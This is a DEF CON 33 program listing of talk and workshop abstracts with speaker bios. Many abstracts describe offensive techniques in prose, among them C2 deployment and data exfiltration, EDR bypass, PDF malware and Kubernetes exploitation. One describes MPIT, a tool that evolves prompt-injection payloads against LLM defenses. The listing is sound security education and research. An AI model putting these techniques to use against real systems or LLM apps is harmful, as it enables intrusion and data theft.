If you have questions about anything regarding human registration that are not addressed here, please ask to speak to a Registration Goon.
This talk explores the hidden risks in apps leveraging modern AI systems, especially those using large language models (LLMs) and retrieval-augmented generation (RAG) workflows. We show how sensitive data, such as personally identifiable information (PII) and social security numbers, can be extracted through real-world attacks. We'll demonstrate model inversion attacks targeting fine-tuned models and embedding inversion attacks on vector databases, among others. The point is to show how PII scanning tools fail to recognize the rich data that lives in these systems and how much of a privacy disaster these AI ecosystems really are.
SpeakerBio: Patrick Walsh
Patrick Walsh has more than 20 years of history running threat research and engineering teams, overseeing products ranging from anti-virus and intrusion prevention to enterprise cloud software. He is a long-time advocate for privacy and security and holds multiple patents in that space. Patrick now leads IronCore Labs, an application data protection platform that uses encryption to protect data stored in the cloud while keeping it searchable and usable. Outside of work, he enjoys the outdoors, photography, hacking, lock picking, biking, swimming, and magic.
As AI advances, how will it impact the landscape of cybersecurity? Especially given that it can help both attackers and defenders, which side will AI help more? In this talk, I will talk about our recent work on Cybergym and Bountybench, evaluating AI agent capabilities in real-world security challenges, where AI agents were able to autonomously discover 15 zero-days in widely distributed open source software and solve bounty tasks worth tens of thousands of dollars. I will also discuss our work on analyzing how frontier AI will impact the landscape of cybersecurity, and our recently launched Frontier AI Cybersecurity Observatory, an open platform for the community to work together on continuous monitoring of AI capabilities in cybersecurity.
SpeakerBio: Dawn Song
Please note: This two-day training will be offered on Saturday and Sunday (August 9-10). Participants will receive a DEF CON Human Badge with their registration.
It is indeed all about the information. Information is power—and those who control it hold the reins. This course dives deep into the topic of Influence Operations (IO), teaching you how adversaries manipulate, deceive, and control the flow of information to achieve their objectives. From destabilizing governments to swaying elections and ruining careers, IO is a tool used by state and non-state actors alike. The question is, how do you defend against it?
In this fast-paced, hands-on course, we’ll break down how IO is planned, executed, and defended against. You’ll gain the skills and knowledge to not only recognize and counteract these operations but to protect yourself, your organization, and even your country from their impact.
What You'll Learn:
By the end of the course, you’ll not only have a deep understanding of how IO is executed, but you'll also walk away with practical tools to defend against these attacks. You’ll learn how to recognize the signs of manipulation, understand the motivations behind IO, and develop countermeasures to protect against them.
In a world where information is weaponized, knowing how to protect yourself is no longer optional. Whether you’re securing yourself, an organization, protecting a political campaign, or defending a nation, this course is your toolkit for navigating the complex and increasingly dangerous world of influence operations.
Speakers: Tom Cross, Greg Conti
Tom Cross is an entrepreneur and technology leader with three decades of experience in the hacker community. Tom attended the first DefCon in 1993, and he ran bulletin board systems and listservs in the early 1990s that served the hacker community in the southeastern United States. He is currently an independent security consultant, Principal at Kopidion, and creator of FeedSeer, a news reader for Mastodon. Previously he was Co-Founder and CTO of Drawbridge Networks, Director of Security Research at Lancope, and Manager of the IBM Internet Security Systems X-Force Advanced Research team. He has written papers on collateral damage in cyber conflict, vulnerability disclosure ethics, security issues in internet routers, encrypting open wireless networks, and protecting Wikipedia from vandalism. He has spoken at numerous security conferences, including Black Hat Briefings, Defcon, CyCon, HOPE, Source Boston, FIRST, and Security B-Sides. He has a B.S. in Computer Engineering from the Georgia Institute of Technology. He can be found on LinkedIn at https://www.linkedin.com/in/tom-cross-71455/, and on Mastodon at https://ioc.exchange/@decius.
SpeakerBio: Greg Conti, Co-Founder and Principal at Kopidion
Greg Conti is a hacker, maker, and computer scientist. He is a nine-time DEF CON speaker, a seven-time Black Hat speaker, and has been a Black Hat Trainer for 10 years. He's taught Adversarial Thinking techniques at West Point, Stanford University bootcamps, NSA/U.S. Cyber Command, and for private clients in the financial and cybersecurity sectors. Greg is Co-Founder and Principal at Kopidion, a cyber security training and professional services firm.
Formerly he served on the West Point faculty for 16 years, where he led their cybersecurity research and education programs. During his U.S. Army and Military Intelligence career he co-created U.S. Cyber Command’s Joint Advanced Cyberwarfare Course, deployed to Iraq as Officer-in-Charge of U.S. Cyber Command’s Expeditionary Cyber Support Element, and was the first Director of the Army Cyber Institute.
Greg is co-author of On Cyber: Towards an Operational Art for Cyber Operations, and approximately 100 articles and papers covering hacking, online privacy, usable security, cyber conflict, and security visualization. Greg holds a B.S. from West Point, an M.S. from Johns Hopkins University, and a Ph.D. from the Georgia Institute of Technology, all in computer science. His work may be found at gregconti.com (https://www.gregconti.com/), kopidion.com (https://www.kopidion.com/) and LinkedIn (https://www.linkedin.com/in/greg-conti-7a8521/).
In this workshop we will start from scratch with nothing more than a GCP project. The only requirement to participate in this workshop is a laptop with an internet connection. We will deploy a virtual machine, install and configure the Mythic C2 Server. We will deploy a virtual machine, deploy and configure the Nemesis offensive data enrichment pipeline and operator support system. We will deploy a mythic-connector to send data automatically from Mythic to Nemesis. We will compromise a vulnerable application and deploy a Mythic C2 agent to said application, then exfiltrate data. We will clone my custom fork of RAGnarok locally and process said data from Nemesis using local, offline AI LLM models. (This can also be done in the cloud but I won’t be providing cloud GPU instances for obvious reasons.) We will then use the insights from this data to compromise another more secure host.
Speakers: Gabi Joseph, Josh Millsap
I have been Red Teaming for 4 years with an academic background in AI/ML.
SpeakerBio: Josh Millsap
I am on the Red Team for Palo Alto Networks. I lead the development, automation, and AI efforts for the team.
Kubernetes is now at the heart of modern infrastructure, yet offensive security content targeting real-world K8s exploitation is still underrepresented—even at DEF CON. K8sploitation: Hacking Kubernetes the Fun Way fills that gap by diving deep into hands‑on Kubernetes hacking techniques including privilege escalation, lateral movement, and control plane compromise. In this workshop, we set aside the buzzwords and focus on practical attacks and defenses drawn from real adversary tradecraft. Whether you’re a red teamer looking to understand how attackers think or a defender seeking to shore up your cluster’s security, you’ll gain invaluable insights through live demos, guided labs, and lessons learned from enterprise and government security operations. This session bridges cloud‑native technology with hands‑on offensive security training in a way that’s rare, relevant, and overdue.
Speakers: Marcelo Ribeiro, Jeff Jordan
Marcelo Ribeiro leads the Offensive Security Special Ops team at Hewlett Packard Enterprise (HPE) with 20+ years of cybersecurity experience across HPE, Microsoft, IBM, and the Brazilian Navy. A former Navy Officer, he helped build Brazil's Naval Cybersecurity capabilities and led IBM's DFIR practice in Latin America.
At HPE, Marcelo develops advanced offensive security programs, leveraging Kubernetes infrastructure and AI to enhance offensive operations and harden cyber defenses. He has presented at DEF CON 2024 and various security conferences, sharing expertise on red teaming, cloud security, and Kubernetes exploitation.
Recognized in the EC-Council CEH Hall of Fame (2023), Marcelo holds CISSP, CISM, OSCP, GXPN, GPEN, GWAPT, GAWN, GRID, GREM, GCIH, GCIA, and more. Passionate about pushing offensive security boundaries, he thrives on tackling new adversarial challenges in modern cloud environments.
SpeakerBio: Jeff Jordan, Hewlett Packard Enterprise (HPE)
Jeff Jordan is a Lead Penetration Tester in the Product Security Office with over 13 years of experience at HPE. He began his career in UEFI validation before transitioning into offensive security, where he now leads technical penetration testing efforts across a wide product portfolio. His work focuses on identifying and mitigating security risks through ethical hacking and secure development practices. Jeff has hands-on experience testing Kubernetes-based platforms, including containerized Home Subscriber Server (HSS) products used in 4G infrastructure. He holds CEH and CCSP certifications and plays a key role in driving product security strategy and execution.
Throughout our Red Team operations, we've focused our research on advancing techniques to gain direct access to physical memory and achieve execution with the highest privileges (kernel mode). This talk presents the current state of the art in stealthy post-exploitation, sharing innovative approaches and refined methodologies developed over recent years. Topics include bypassing modern EDR solutions via physical memory access primitives, physical access techniques, and advanced post-exploitation techniques in Windows systems. We will demonstrate how often-overlooked low-level access vectors can enable persistent, undetectable control over targeted systems. The session is tailored for cybersecurity professionals interested in cutting-edge Red Team tactics and emerging hardware/software threats. Practical demos will be included, along with tools and methodologies applicable across multiple scenarios. This is a deeply technical talk, showcasing real-world tradecraft and threat modeling beyond traditional offensive security.
References:
Red Team Operator and Security Researcher with over ten years of experience in offensive cybersecurity. Throughout his career, he has worked hands-on in assessing, exploiting and mitigating security vulnerabilities, developing proof-of-concepts, offensive and defensive tools, and conducting in-depth security research on commercial and proprietary solutions. His approach is based on a combination of applied research and real-world experience, emphasizing continuous learning and optimization of defense and attack strategies.
SpeakerBio: Borja "borjmz" Martinez
Computer security has been a passion for him for as long as he can remember. He is self-taught and seeks to learn something new every day, both professionally and personally. He is a specialist with more than 9 years of experience in pentesting, Red Team and research, with a highly versatile profile. He is also a CTF player.
On Saturday, we have a timed competition from 10:30am-5:30pm on a new scenario. Each team/individual is given Kubernetes API access to a team-specific cluster for each flag. The team can capture flags and win points as they progress. A scoreboard tracks the teams' current and final scores. In the event of a tie, the first team to achieve the score wins that tie. This is open to only 30 teams and only from Saturday 10:30am - 5:30pm Pacific.
On Friday through Sunday, we have a non-competitive learning run, where you can go through the Kubernetes CTF scenario from a previous year. It has an available "cheat sheet" that shows you how to run through, start to finish! You can do this without the "cheat sheet" if you want a puzzle.
Each team/individual gets a Kubernetes cluster that contains a set of flags.
This is open to up to 30 teams and is available from Friday 12pm to Sunday 12pm Pacific.
We will support DEF CON players in the contest area during the following times:
- Friday: 12:00-17:00
- Saturday: 10:00-17:00
- Sunday: 10:00-12:00
BLE CTF is a series of Bluetooth Low Energy challenges in a capture-the-flag format. It was created to teach the fundamentals of interacting with and hacking Bluetooth Low Energy services. Each exercise, or flag, aims to interactively introduce a new concept to the user.
Over the past few years, BLE CTF has expanded to support multiple platforms and skill levels. Various books, workshops, training, and conferences have utilized it as an educational platform and CTF. As an open source, low-cost of entry, and expandable education solution, BLE CTF has helped progress Bluetooth security research.
This workshop will teach the fundamentals of interacting with and hacking Bluetooth Low Energy services. Each exercise, or flag, aims to interactively introduce a new concept to the user. For this workshop, we will undergo a series of exercises to teach beginner students new concepts and allow more seasoned users to try new tools and techniques. After completing this workshop, you should have a good solid understanding of how to interact with and hack on BLE devices in the wild.
Speakers: Ryan Holeman, Alek Amrani
Ryan Holeman resides in Austin, Texas, where he works as the CISO for Stability AI. He is currently pursuing a Ph.D. in cyber defense from Dakota State University. He has spoken at respected venues such as Black Hat, DEF CON, Lockdown, BSides, Ruxcon, Notacon, and Shmoocon. You can keep up with his current activity, open source contributions, and general news on his blog. His spare time is mostly spent digging into various network protocols, random hacking, creating art, and shredding local skateparks.
SpeakerBio: Alek Amrani
Alek Amrani is bad at expense reports.
Dive into the dynamic world of Open Source Intelligence (OSINT) with this quick workshop designed to give you a taste of practical online investigations and threat hunting. Led by a seasoned professional, this immersive session offers a condensed yet impactful introduction to essential OSINT techniques that you can use in your red teaming engagements.
Experience the power of hands-on learning as you engage in live demonstrations, exploring key concepts such as operational security (OpSec), advanced search engine queries, username and phone number lookups, social media reconnaissance, breached records analysis, network reconnaissance, historical records, and essential documentation, all within the span of this engaging workshop. Through interactive exercises and guided discussions, participants will gain a glimpse into the world of OSINT.
Who’s it for?
This training is suited for all individuals in any field with a keen interest in online investigations, regardless of their experience level in OSINT.
SpeakerBio: Mishaal Khan
Mishaal is a subject matter expert in cybersecurity, pentesting, privacy, Open Source Intelligence and social engineering, and a frequent speaker on these topics at universities and popular cybersecurity conferences like DEF CON, Black Hat, Wild West Hackin Fest, TEDx, and multiple BSides Security events.
Mishaal has worked with multinational companies for over 20 years, securing their networks and providing executive-level consultancy as a CISO to manage risk and avoid breaches. He's the author of the book The Phantom CISO, runs a cybersecurity practice as a vCISO, and owns a privacy management and investigations firm.
Lex Sleuther is an internal tool developed at CrowdStrike for detecting the script language of an unknown text file based purely on its contents. We derive a novel approach using lexer generators and ridge regression and develop the solution as a compact Rust binary with Python bindings. We compare our solution to the current state of the art and present CrowdStrike’s own findings of relative efficacy in the field. Lex Sleuther has been recently open sourced for everybody to use.
SpeakerBio: Aaron "KNOX" James
Aaron has been the tooling guy for over 13 years, ever since he first wrote hacks for his favorite games. He still writes hacking tools, but now for security companies.
Capture the flag for beginners to advanced.
If you find something that seems to have been lost, please take that item to the nearest NFO Node. The item will enter the DEF CON Lost & Found system.
If you've lost something, the only way to check on it (or reclaim it) is by going to the Lost & Found department yourself. The Lost & Found department is in room LVCC - L2 - W238. You may also call Lost & Found at +1 (702) 477-5019.
The Lost & Found department plans to be open Thursday - Saturday, during all hours that the conference operates. On Sunday, the Lost & Found department will open with the venue at 08:00, but will close at the beginning of DEF CON 33 Closing Ceremonies (15:00). Shortly thereafter, all remaining lost items will be transferred to the LVCC. If you need to reach LVCC's Lost & Found, you may call LVCC Dispatch at +1 (702) 892-7400.
Patrick Wardle is the founder of the Objective-See Foundation, the CEO/Cofounder of DoubleYou, and the author of "The Art of Mac Malware" book series. Having worked at NASA and the NSA, as well as presenting at countless security conferences, he is intimately familiar with aliens, spies, and talking nerdy. Passionate about macOS security, Patrick spends his days discovering Apple 0days, studying macOS malware, and releasing free open-source security tools to protect Mac users.
In his final boss form "Houdinti", @intidc delivers an interactive magic show in which every trick is an actual live hack. During this spectacle, we're hacking several locks, biometrics, passwords, PIN codes and more! The show is suited for both beginners and pros, who'll get the opportunity to take a guess at how the tricks work before they are revealed. Live hacking demonstrations will never be the same again.
SpeakerBio: Inti "intidc" De Ceukelaire, Chief Hacker Officer at Intigriti
Inti De Ceukelaire is a Belgian ethical hacker and cybercrime investigator. He currently works as the Chief Hacker Officer at Intigriti, Europe's largest vulnerability disclosure platform and a founding member of the Hacker Policy Council. In 2018, Inti won the "Most Valuable Hacker" award at the largest live hacking event in Las Vegas.
With extensive experience in the field of security and ethical hacking, Inti has earned a reputation as a thought leader in the industry. His work and expertise have been featured in a variety of international publications, including the BBC, Wired, The Verge, CNET, Mashable, and New York Magazine. Inti has made global headlines through his security awareness pranks, which have included manipulating the Vatican's website, creating fake news on Donald Trump's Twitter account, and hacking Metallica. Through these high-profile stunts, Inti has drawn attention to the importance of cybersecurity and the need for individuals and organisations to be vigilant about potential threats. As an experienced and engaging speaker, Inti is able to make complex topics accessible to a wide audience. He has spoken at a variety of conferences and events, sharing insights on the latest trends in cybersecurity and offering practical tips to help individuals and organisations protect themselves from potential threats.
He is also a trusted source for media outlets seeking expert commentary on topics related to cybersecurity, hacking and technology.
Michael Aguilar (v3ga) is a Principal Consultant for Sophos Red Team. He leads efforts in Medical Device testing, Adversarial Simulations, Physical Security assessments, Network testing and more. Currently, he has 8 CVE vulnerabilities aligned with security issues located during testing at DEF CON's Biohacking Village Device Lab. He has also led the winning team of the DEF CON Biohacking Village CTF for two consecutive years.
Join us for an in-depth exploration of how PDFs, a ubiquitous document format, can be exploited as a vessel for executing malicious JavaScript malware. This presentation will delve into real-world vulnerabilities that have been targeted to execute harmful code within PDF files, posing a serious threat in today's cybersecurity landscape.
Key exploit techniques we'll explore include:
Heap Spray Attacks: Using shellcode to strategically overwrite memory, thereby enabling attackers to execute arbitrary code and gain control over target systems.
Data Exfiltration Tactics: Methods for covertly extracting critical information, such as email addresses and system details, from users without their knowledge or consent.
Embedding Malware in PDFs: An examination of how attackers embed harmful scripts into PDFs, tricking users into activating exploits within Adobe Reader through seemingly ordinary actions.
We'll dissect malicious actions such as shellcode injection, buffer overflow attacks, Adobe Reader exploits, and memory manipulation, all designed to execute malware effectively.
This session is perfect for offensive security professionals seeking to deepen their understanding of PDF-based exploits and enhance their penetration testing and threat emulation capabilities. Discover how these sophisticated threats operate and learn strategies to counteract them within your security frameworks. Join us to stay ahead in the ever-evolving world of cyber threats.
More information about the presentation can be found in this article: https://labs.senhasegura.blog/unmasking-the-threat-a-deep-dive-into-the-pdf-malicious-2/
SpeakerBio: Filipi Pires
I've been working as Head of Identity Threat Labs and Global Product Advocate at Segura, Founder at Black&White Technology, Cybersecurity Advocate, Snyk Ambassador, Application Security Specialist and Hacking is NOT a crime Advocate. An international speaker at security and new technology events in many countries such as the US, Canada, France, Spain, Germany, Poland, and others, I've served as a university professor in graduate and MBA courses at Brazilian colleges. In addition, I'm the creator and instructor of the courses Malware Attack Types with Kill Chain Methodology (PentestMagazine), PowerShell and Windows for Red Teamers (PentestMagazine) and Malware Analysis - Fundamentals (HackerSec).
npm is owned by Microsoft and is the world's largest software registry. It hosts nearly 5 million packages, and 4.5 trillion requests for packages were made to npm in 2024. The open and accessible nature of npm is one of its main features, but it's also one of the reasons that threat actors are attracted to it. A recent study by Sonatype found that 98.5% of malicious software packages are hosted and delivered via npm.
This technical deep-dive will explain why npm is so good at delivering malware, expose how threat actors are using npm, and show why existing security tools like SCA, SAST, EDR and anti-virus solutions will not protect you from npm-based malware.
Key Topics:
Don't let Paul's baby face fool you, he has been working with engineering teams for 30 years. Paul's specialty is helping organizations build secure applications at scale. He's done that for large organizations like NASA, John Deere, Blue Cross/Blue Shield, US Army, and the Australian government. He's also built or worked for several startups along the way helping them do the same thing. Paul spent most of his career in Utah but now lives in Australia with his wife and 3 kids.
In this talk, the speaker details how a threat actor's OPSEC slip, testing their own keylogger and infostealer on their hacking machine, provided a real-time view into a cybercrime operation. By intercepting Telegram-based command-and-control (C2) communications, the speaker obtained hundreds of screenshots and keylogs of the threat actor's desktop, revealing the entire cybercrime operation. The session also covers the creation of Telegram bot tokens, which were then embedded in malware to enable covert data exfiltration and remote control.
Through automated analysis techniques, including VirusTotal and custom YARA rules, the speaker tracked samples communicating with Telegram's API, extracted thousands of bot tokens that were used to forward stolen data, used these to intercept communications, and mapped backend infrastructure through screenshots of the threat actor's desktop. This process led to the discovery of links to broader phishing and malware campaigns, underscoring how trusted platforms like Telegram can be abused by malicious actors.
References:
SpeakerBio: Ben "polygonben" Folland
Ben Folland is a Security Operations Analyst at Huntress, where he manages hands-on-keyboard intrusions and dismantles active threats daily. Before that, he worked at one of Accenture's SOCs, defending UK Critical National Infrastructure, gaining deep experience in high-stakes environments. He's all about DFIR, malware analysis, and threat hunting, and has a knack for exposing adversary tradecraft. Ben has spoken at over 10 conferences (including six BSides), taught SOC workshops at universities, is GIAC GCFA certified, and was a finalist for the UK's national cyber team. Whether it's CTFs or live incidents, Ben thrives on the chase and brings a hacker mindset to everything he does.
Please note: This is a four-day training that will be held Saturday-Tuesday (August 9-12). Participants will receive a DEF CON Human Badge with their registration.
The topic of the course is offensive security testing of medical devices and the impact this has on the future of medical device production. The course runs from a seasoned entry/mid level to an advanced level. The students will learn all that the trainers know about medical device hacking and the things they have learned in their interactions as testers with these devices. This includes skills such as:
The DEF CON Memorial Chamber serves as a sacred space within our community — a place where we pause to honor those hackers whose brilliance and dedication have elevated not just our craft, but the entire security ecosystem. Here we remember figures whose generous spirit and willingness to coordinate security fixes demonstrated that true hacking greatness lies in collaboration. We are here because DEF CON has been the beating heart of the hacker community for over three decades, growing from 100 people in 1993 to the world's largest hacker conference. As Jeff Moss envisioned, DEF CON is what we make of it; this memorial space represents our commitment to ensuring that the legacy of those we've lost continues to inspire future generations of hackers to pursue knowledge, build community, and use their gifts to make the world better.
Proxies, along with local, reverse, and dynamic forwards, enable red teams to maintain persistent access and move laterally within target environments. By combining these techniques, operators can construct sophisticated attack chains that enable deep network access through multiple segmented environments. This presentation will dive into the setup, usage, and attacker techniques required to be effective with proxies. To demonstrate these techniques, the presenters will use a publicly available tunneling toolkit, Messenger.
Speakers: Skyler Knecht, Kevin Clark
SpeakerBio: Skyler Knecht
Skyler is a Senior Security Consultant at SpecterOps, where he performs security assessments for Fortune 500 organizations. With over six years of experience, he focuses on initial access research and contributes to the security community through open-source development and conference presentations. Skyler has presented at DEF CON and BSides and actively collaborates on open-source projects such as Messenger, Ek47, Connect, and Metasploit. He also conducts vulnerability research, having discovered multiple zero-day vulnerabilities in enterprise software.
SpeakerBio: Kevin Clark, Red Team Instructor at BC Security
Kevin Clark is a Security Consultant with TrustedSec and a Red Team Instructor with BC Security, with a diverse background in software development, penetration testing, and offensive security operations. Kevin specializes in initial access techniques and Active Directory exploitation. He has contributed to open-source projects such as PowerShell Empire and developed custom security toolkits, including Badrats and Ek47. A skilled trainer and speaker, Kevin has delivered talks and conducted training sessions all over the country at cybersecurity conferences, including Black Hat and DEF CON, and authors a cybersecurity blog at https://henpeebin.com/kevin/blog.
Bare metal cloud providers are rapidly gaining popularity among organizations deploying high-performance machine learning workloads. While the promise of dedicated hardware and enhanced security may appear attractive, a closer look revealed that these environments are vulnerable to decades-old attacks that are sure to trigger nostalgia.
This talk investigates the hidden risks posed by the "bare metal" trend, illustrating how weaknesses in firmware, hardware, and the network can lead to catastrophic multi-tenant compromise. We'll walk through real-world case examples demonstrating how attackers can leverage these vulnerabilities including hijacking provisioning processes, installing persistent firmware implants, intercepting sensitive network data, and compromising secure machine learning workflows.
Attendees will gain insight into the unique attack surfaces of bare metal environments, understand why seemingly outdated techniques remain highly effective, and learn how major cloud providers mitigate these threats. Expect technical demonstrations, practical advice on evaluating providers, and recommendations for protecting your organization's critical infrastructure.
SpeakerBio: Bill Demirkapi
Bill is a security researcher with a passion for finding bugs at scale. His interests include reverse engineering and vulnerability research, ranging from low-level memory corruption to systemic flaws with catastrophic consequences. He started his journey in high school and has since published his work at internationally recognized conferences like DEF CON and Black Hat USA. In his pursuit to make the world a better place, Bill constantly looks for the next significant vulnerability, following the motto "break anything and everything".
Metasploit continues to expand support for Active Directory Certificate Services attacks, as well as its protocol relaying capability and attack workflows for evergreen vulnerabilities. This year, we added support for SMB-to-LDAP relaying and SMB-to-HTTP relaying, as well as support to identify and exploit a number of AD CS flaws. We’ve also added the new PoolParty process injection capability to Windows Meterpreter sessions, along with support for System Center Configuration Manager attack workflows.
Speakers: Spencer "ZeroSteiner" McIntyre, Jack Heysel
SpeakerBio: Spencer "ZeroSteiner" McIntyre
Spencer is a senior security research manager at Rapid7, where he works on the Metasploit Framework. He has been contributing to Metasploit since 2010, a committer since 2014, and a core team member at Rapid7 since 2019. Previously, he worked at a consulting firm working with clients from various industries, including healthcare, energy, and manufacturing. He is an avid open source contributor and Python enthusiast.
SpeakerBio: Jack Heysel
Jack is a senior security researcher at Rapid7, where he contributes to and helps maintain the Metasploit Framework. He started at Rapid7 in 2016 working on their vulnerability management solution. He transitioned to the Metasploit team in 2021 and has been happily writing and reviewing exploits ever since. While AFK, he enjoys exploring the mountains and outdoors that surround his home.
Distributed data replication systems are more than just tools for redundancy—they’re fertile ground for creative abuse. In this talk, we explore how technologies like NFTs, IPFS, Codex, and Cloudflare R2 can become resilient C2 infrastructures, payload delivery systems, and phishing hosting that challenge takedown efforts. Welcome to the next phase of decentralized threats.
This sequel to “MFT: Malicious Fungible Tokens” explores how distributed data replication systems can be used for malicious purposes. We’ll demonstrate how technologies like Codex, WhenFS, IPFS, and Cloudflare R2 buckets can store and distribute C2 commands, payloads, and even phishing campaigns such as templates or client-side drainers. These systems enable infrastructures that are resistant to takedowns and, in some cases, nearly unstoppable. Through practical examples and live demonstrations, we’ll uncover the risks these systems pose and discuss their implications for security teams.
This talk is a continuation of "Everything is a C2 if you're brave enough" from Red Team Village and "MFT: Malicious Fungible Tokens" from Adversary Village, which explains how to turn NFTs into immortal C2 Servers. It is not needed to have attended these talks as a short recap will be featured.
Speakers: Mauro Eldritch, Nelson Colón
Prompt injection is an emerging and poorly standardized attack vector targeting large language model applications. Unlike traditional vulnerabilities, there is no universal testing methodology or tooling, making it difficult for penetration testers to assess the security posture of LLM-integrated systems. Matrix Prompt Injection Tool aims to fill this gap by automating the generation of diverse prompt injection payloads.
[1] Dynamic Input Detection: MPIT scans target websites to identify expected input fields where LLMs might process user requests.
[2] Payload Enrichment: Each pattern includes crafted elements such as exploit strings, delimiters, and reasoning cues, enhancing the quality of the penetration test.
[3] Genetic Algorithm Optimization: The tool employs a genetic algorithm to evolve and refine injection patterns, increasing their success rate significantly across different LLM defenses.
[4] Practical Utility for Pentesters: MPIT is designed to support real-world offensive security assessments, making LLM-targeted testing more feasible and effective.
ShinoLLMApps is a collection of vulnerable LLM web applications that use RAG and tools to help you test MPIT and better understand prompt injection and its risks. More info at github.com/Sh1n0g1/mpit and shinohack.me/shinollmapp.
Speakers: Shota "Sh1n0g1" Shinogi, Sasuke "Element138" Kondo
SpeakerBio: Shota "Sh1n0g1" Shinogi
Shota is a security researcher at Macnica, a pentest tools author, and a CTF organizer. He is an expert in writing tools for red teams to evade detection by EDR, sandboxes, IPS, antivirus, and other security solutions. His malware simulators ShinoBOT and ShinoLocker contribute to the cybersecurity industry by helping people who want to test malware safely. He has more than 15 years of experience in the cybersecurity industry, starting his career with HDD encryption, NAC, IPS, WAF, sandbox, EDR, and penetration testing. He has spoken at several security and hacking conferences, including Black Hat, DEF CON, and BSidesLV. He also contributes to the education of the next generation of security engineers through the Security Camp in Japan, every year since 2015.
SpeakerBio: Sasuke "Element138" Kondo
Sasuke is a high school developer with a growing focus on LLM security. While relatively new to cybersecurity, he approaches it with a builder's mindset shaped by his experience creating web applications for real-world use, such as supporting school operations. His interest in LLM vulnerabilities began at the 2024 Japan Security Camp, where he started developing MPIT, the prompt injector he first presented at CODE BLUE 2024 and is now bringing to DEF CON. Outside cybersecurity, he is a two-time silver medalist in the Japan Linguistics Olympiad and a recent participant in the Japan Olympiad in AI.
Operating with modern red team tools has a lot of ins, a lotta outs, a lotta what-have-yous. If you were like me before operating with tools like Mythic, managing your projects with Ghostwriter, and analyzing your data automatically with Nemesis, you were probably living in the past and piecing things together manually, writing things down in a tedious, un-zen lack-of-system that would leave you scrambling at the end of testing, when your report should be about to go to a peer review or QA.
You might be saying, "But Michael, I like doing things manually and wasting mine and my client's time." Yeah, well, you know, that's just, like, your opinion, man.
That is entering a world of pain. I don't know about you, but when that's happening, I feel really out of my element.
Luckily, Mythic, Ghostwriter, and Nemesis really tie the room together and are a huge quality-of-life boost. No more will you say to yourself, "This aggressor script will not stand, man!" Sometimes the bear eats you, but it's high time you eat the bear.
Get ready to be bowled away by a modern approach to managing your red team operations with tools like Mythic, Ghostwriter, and Nemesis (or whatever else you can think of to plug into these tools' APIs if you're not into the whole brevity thing) to streamline your workflow.
You might get so excited that you'll flail your arms around in joy - but be careful man, there's a beverage here!
SpeakerBio: Michael Donley
Michael is an Adversary Simulation Consultant at SpecterOps, where he deals in testing all the things - networks, web apps, Kubernetes clusters, humans, physical sites, and especially the potency of energy drinks.
He is the Director of Volunteers for the Red Team Village and loves helping people new to the field (especially career changers) find their foothold in the infosec industry.
When he's not hacking stuff or learning about new things, he is a drummer for just about any improv show in Chicago that has music in it.
The maritime domain's vastness often masks hidden threats. This talk explores leveraging Open-Source Intelligence (OSINT) to enhance maritime security. We'll demonstrate practical, low-cost methods to gather and analyze publicly available data – including vessel tracking, port data, and social media – for identifying anomalous behaviors and predicting potential cyber-physical risks. Attendees will learn actionable techniques to build a proactive threat intelligence picture without specialized tools, providing crucial insights for defenders in this critical sector.
Speakers: Mehmet Önder Key, Furkan Aydogan
SpeakerBio: Mehmet Önder Key
Önder Key is a cybersecurity consultant specializing in critical infrastructure security, zero-day vulnerability analysis, and offensive security. He has advised organizations in high-security sectors such as defense, aerospace, and finance, with hands-on experience in both red teaming and strategic security engineering. His work has been featured across numerous countries and platforms, contributing to the discovery of systemic vulnerabilities. Currently, he provides consultancy to Burkut, Ogrit, Ravenailabs and continues to advance the global offensive security ecosystem by challenging traditional approaches to cybersecurity.
SpeakerBio: Furkan Aydogan, UNCW
Dr. Aydogan is an Assistant Professor of Computer Science at UNCW and a researcher in cybersecurity, digital forensics, and brainwave-based encryption systems. His Ph.D. focused on using EEG signals to secure IoT devices—blending neuroscience with cryptography. He's a two-time award winner for research in VANET security and cognitive encryption.
Cloud penetration testing has become a hot topic in the offensive community, as cloud-based infrastructures have slowly been taking the place that on-prem ones used to hold. This calls for tooling built for the job. Nebula is a cloud pentest framework that offers reconnaissance, enumeration, exploitation, and post-exploitation on AWS, Azure, and DigitalOcean, and above all the opportunity to extend it further. It is built modularly for each provider and each attack, allowing for diversity in attack surface. Coupled with its client-server architecture, this allows for a collaborative team assessment of a hybrid cloud environment.
SpeakerBio: Bleon "Gl4ssesbo1" Proko
Bleon is an infosec enthusiast passionate about infrastructure penetration testing and security, including Active Directory, cloud (AWS, Azure, GCP, Digital Ocean), hybrid infrastructures, as well as defense, detection, and threat hunting. He has presented topics related to cloud penetration testing and security at conferences like Black Hat USA, Europe, and Sector, DEF CON, SANS Pentest Hackfest Hollywood and Amsterdam, as well as several BSides in the USA and Europe. His research includes Nebula, a cloud penetration testing framework, and other work that you can find on his blog: blog.pepperclipp.com. He is also the author of YetiHunter and DetentionDodger; github.com/permiso-io-tools. He is also the author of the upcoming book Deep Dive into Clouded Waters: An Overview in Digital Ocean's Pentest and Security; leanpub.com/deep-dive-into-clouded-waters-an-overview-in-digitaloceans-pentest-and-security.
Traditional digital security often falls short when applied to IoT environments, where devices are limited in processing power and exposed to a wider range of threats. Human vulnerabilities—especially against deepfake-style attacks—further weaken current systems. Static biometrics like fingerprints or facial scans are no longer enough. This work proposes a new direction: using the brain’s unique electrical activity (EEG signals) as a security layer. These dynamic, hard-to-replicate patterns offer a way to authenticate users without storing sensitive data or relying on heavy computation. By grounding trust in the user’s own biological signals, this approach offers a lightweight, resilient solution tailored to the constraints of modern IoT devices.
Speakers: Mehmet Önder Key, Temel Demir, Dr. Ahmet Furkan Aydogan
SpeakerBio: Mehmet Önder Key
Önder Key is a cybersecurity consultant specializing in critical infrastructure security, zero-day vulnerability analysis, and offensive security. He has advised organizations in high-security sectors such as defense, aerospace, and finance, with hands-on experience in both red teaming and strategic security engineering. His work has been featured across numerous countries and platforms, contributing to the discovery of systemic vulnerabilities. Currently, he provides consultancy to Burkut, Ogrit, Ravenailabs and continues to advance the global offensive security ecosystem by challenging traditional approaches to cybersecurity.
SpeakerBio: Temel Demir, Cybersecurity Lead at KPMG
Every once in a while, we get a grim reminder that the open-source trust model that enables developers to use each other's code and resources can be abused by attackers.
GitHub users recently suffered from such a wake-up call. In March 2025, the highly publicized "tj-actions" incident came to light, throwing many GitHub organizations and users into panic, as their credentials were leaked via their supply chain. But while the masses were scared about the massive credential exposure, we were able to piece together evidence to show that the leakage wasn't the primary goal of this attack, and that the initial buzz was just the tip of the iceberg. Our investigations indicate that more highly popular projects were targeted as part of this campaign, and DEF CON will be the first place that we reveal the newly discovered details.
